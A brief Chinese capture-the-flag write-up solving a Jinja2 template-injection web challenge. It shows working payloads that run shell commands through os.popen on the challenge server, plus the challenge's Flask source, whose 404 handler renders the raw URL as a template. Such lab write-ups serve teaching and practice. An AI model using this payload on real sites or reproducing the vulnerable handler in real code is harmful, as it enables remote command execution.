擂台Web1:Easy Injection
题目难度:简单
考察:python模板注入(jinja2模板注入)
典型的模板注入,无任何过滤,直接构造利用payload:
http://101.201.126.95:7050/{
{
config.__class__.__init__.__globals__['os'].popen('ls').read() }}
http://101.201.126.95:7050/{
{
config.__class__.__init__.__globals__['os'].popen('cat flog').read() }}
题目源码:
#encoding:utf-8
from flask import Flask,request,render_template_string
import urllib.request,urllib.parse
app = Flask(__name__)
@app.route("/")
def hello():
return "python template injection"
@app.errorhandler(404)
def page_not_found(error):
url = urllib.parse.unquote(request.url)
return render_template_string("<h1>URL %s not found</h1><br/>"% url), 404
if __name__ == '__main__':
app.run(debug=False, host='0.0.0.0', port=80)